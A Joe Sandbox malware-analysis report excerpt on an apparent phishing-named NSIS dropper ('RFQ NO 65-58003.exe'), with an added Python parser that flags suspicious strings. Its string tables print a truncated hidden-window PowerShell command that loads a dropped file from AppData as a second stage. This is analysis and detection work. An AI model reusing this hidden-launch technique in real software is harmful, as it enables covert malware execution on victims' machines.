                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: (7B$A$C:\Users\user\AppData\Roaming\afdragsordning$powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas
                                                              • API String ID: 2624150263-3259473516
                                                              • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                              • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                              • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                              • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
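The entry above is the installer's directory-selection dialog handler (GetDlgItem 0x3FB, SHBrowseForFolderW, GetDiskFreeSpaceW, then MulDiv with 0x400 and a "%u.%u%s%s" format to display free space), and its string table is where the second stage surfaces: a `powershell.exe -windowstyle hidden` command that reads the dropped file `Rygklapperne.Tis225` under `%APPDATA%\afdragsordning` with `gc -raw`. The report truncates that command line at `$Gas`, so the rest of the script cannot be recovered from this section. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses one entry's `APIs` and `Strings` lines into records and applies two constructed heuristics (a hidden-window PowerShell launch string, and a `gc`/`cat`/`type`/`Get-Content` read of a path under AppData) so entries like this one can be pulled out of a long report mechanically instead of by scrolling. The regexes, heuristic names and the sample input are assumptions of this example; the sample is a trimmed copy of the entry above with the command line kept truncated as on the page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: the APIs/Strings part of the directory-page entry from
# the report above (trimmed; the PowerShell line is cut off at "$Gas" on the
# page and is deliberately kept truncated here).
SAMPLE_ENTRY = r"""APIs
• GetDlgItem.USER32(?,000003FB), ref: 004047C0
• SetWindowTextW.USER32(00000000,?), ref: 004047EA
• SHBrowseForFolderW.SHELL32(?), ref: 0040489B
• CoTaskMemFree.OLE32(00000000), ref: 004048A6
• lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004048D8
• lstrcatW.KERNEL32(?,004281E0), ref: 004048E4
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
  • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
• GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?), ref: 004049B9
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
  • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
Strings
• (7B, xrefs: 0040486E
• powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas, xrefs: 0040478A
• C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004048C1
• A, xrefs: 00404894
Memory Dump Source
• Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

# One bullet of the "APIs" list: optional "Part of subcall function X:" prefix,
# Api.MODULE, optional (args), then the call-site address after "ref:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
# One bullet of the "Strings" list: text, then the referencing address.
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)\s*$")

# Heuristics (assumed, not from the report). PowerShell accepts any unambiguous
# prefix of -WindowStyle, so "-w", "-win", "-windowstyle" all count.
HIDDEN_PS = re.compile(r"^\s*powershell(?:\.exe)?\b.*\s-w\w*\s+hidden\b", re.IGNORECASE)
READS_APPDATA = re.compile(r"\b(?:gc|cat|type|get-content)\b[^;|]*\\AppData\\", re.IGNORECASE)
DIR_PAGE_APIS = {"SHBrowseForFolderW", "GetDiskFreeSpaceW", "MulDiv"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None   # address of the callee when the line is a subcall


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)   # (text, xref)


def parse_entry(text: str) -> FunctionEntry:
    """Parse the APIs/Strings lists of one IDA-plugin function entry."""
    entry = FunctionEntry()
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in ("APIs", "Strings"):
            section = stripped
            continue
        if stripped == "Memory Dump Source":   # end of the lists we care about
            break
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                entry.apis.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                entry.strings.append((m["text"], m["ref"]))
    return entry


def assess(entry: FunctionEntry) -> dict:
    """Apply the constructed heuristics; returns findings with their xref addresses."""
    findings = []
    for text, xref in entry.strings:
        if HIDDEN_PS.search(text):
            findings.append(f"{xref}: hidden-window PowerShell launch string")
        if READS_APPDATA.search(text):
            findings.append(f"{xref}: reads a file under AppData into a variable")
    if DIR_PAGE_APIS <= {c.api for c in entry.apis}:
        findings.append("API set of an installer directory-selection page (browse folder + free-space display)")
    return {"suspicious": any("PowerShell" in f for f in findings), "findings": findings}


if __name__ == "__main__":
    result = assess(parse_entry(SAMPLE_ENTRY))
    for f in result["findings"]:
        print(f)
```

Feeding every function entry of the report through `parse_entry` and `assess` surfaces the handler whose strings embed the PowerShell launch, with the xref address (0040478A here) that tells you where in the stub to look for the rest of the command line once the full string is dumped.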
                                                              APIs
                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\afdragsordning\Overrack2, xrefs: 004021C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Roaming\afdragsordning\Overrack2
                                                              • API String ID: 542301482-2472733074
                                                              • Opcode ID: 61b713bc69220648ef0ee8d4cb260af03843adae2956f13d344839b2a1627aa1
                                                              • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
                                                              • Opcode Fuzzy Hash: 61b713bc69220648ef0ee8d4cb260af03843adae2956f13d344839b2a1627aa1
                                                              • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
                                                              • GetSysColor.USER32(?), ref: 00404553
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                              • lstrlenW.KERNEL32(?), ref: 00404574
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                              • SendMessageW.USER32(00000000), ref: 004045F6
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
                                                              • SetCursor.USER32(00000000), ref: 00404675
                                                              • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
                                                              • SetCursor.USER32(00000000), ref: 00404699
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                              • String ID: N$open$C@
                                                              • API String ID: 3615053054-346628716
                                                              • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                              • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                              • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                              • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                              • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                              • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                              • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                              APIs
                                                              • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,004060D4,?,?), ref: 00405F50
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,004060D4,?,?), ref: 00405F74
                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
                                                                • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                                • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                              • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
                                                              • wsprintfA.USER32 ref: 00405FB8
                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                              • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                              • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
                                                                • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405DEB
                                                                • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                              Strings
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                              • API String ID: 222337774-899692902
                                                              • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                              • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                              • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                              • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                              • CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                              • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                              Strings
                                                              • "C:\Users\user\Desktop\RFQ NO 65-58003.exe", xrefs: 004064A6
                                                              • *?|<>/":, xrefs: 004064F8
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-993393911
                                                              • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                              • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                              • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                              • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
                                                              • GetSysColor.USER32(00000000), ref: 00404376
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404382
                                                              • SetBkMode.GDI32(?,?), ref: 0040438E
                                                              • GetSysColor.USER32(?), ref: 004043A1
                                                              • SetBkColor.GDI32(?,?), ref: 004043B1
                                                              • DeleteObject.GDI32(?), ref: 004043CB
                                                              • CreateBrushIndirect.GDI32(?), ref: 004043D5
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                              • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                              • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                              • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026CC
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740
                                                                • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC
                                                              Strings
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                              • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                              • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                              • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
                                                              • GetTickCount.KERNEL32 ref: 00402E6C
                                                              • wsprintfW.USER32 ref: 00402E9A
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                                • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                                • Part of subcall function 00402E17: MulDiv.KERNEL32(0033D8FA,00000064,0033F144), ref: 00402E2C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                              • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                              • Opcode Fuzzy Hash: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                              • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                              • GetMessagePos.USER32 ref: 00404C5E
                                                              • ScreenToClient.USER32(?,?), ref: 00404C78
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                              • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                              • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                              • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401DB6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                              • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID: Tahoma
                                                              • API String ID: 3808545654-3580928618
                                                              • Opcode ID: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
                                                              • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                              • Opcode Fuzzy Hash: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
                                                              • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
                                                              • wsprintfW.USER32 ref: 00402DEA
                                                              • SetWindowTextW.USER32(?,?), ref: 00402DFA
